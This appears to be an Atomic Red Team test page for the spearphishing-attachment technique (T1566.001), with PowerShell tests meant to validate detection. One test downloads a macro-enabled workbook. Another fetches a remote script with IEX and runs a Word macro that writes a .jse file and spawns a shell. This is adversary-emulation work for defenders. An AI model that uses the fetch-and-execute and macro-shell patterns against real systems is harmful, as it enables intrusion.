Try it using Invoke-Atomic

Phishing: Spearphishing Attachment

Description from ATT&CK

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Atomic Tests

Atomic Test #1 - Download Macro-Enabled Phishing Attachment

This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.

Supported Platforms: windows

auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4
$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm

Cleanup Commands:

1
2
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore

Atomic Test #2 - Word spawned a command shell and used an IP address in the command line

Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity. Upon execution, CMD will be launched and ping 8.8.8.8.

Supported Platforms: windows

auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f

Inputs:

Name Description Type Default Value
jse_path Path for the macro to write out the "malicious" .jse file    
string C:\Users\Public\art.jse    
ms_product Maldoc application Word or Excel string Word

Attack Commands: Run with powershell!

1
2
3
4
5
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Cleanup Commands:

1
2
Remove-Item #{jse_path} -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
7
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
2
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

source